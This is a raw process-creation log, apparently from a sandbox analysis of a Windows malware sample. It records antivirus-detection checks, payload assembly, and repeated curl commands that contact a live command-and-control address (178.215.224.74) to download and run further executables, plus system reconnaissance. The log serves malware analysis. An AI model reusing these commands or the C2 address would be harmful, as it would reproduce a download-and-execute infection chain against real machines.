Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139918Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SyntaxMilesImperialTriple" Credits Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps vJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139918\Ur.pif Ur.pif vJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zipJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zipJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknownJump to behavior
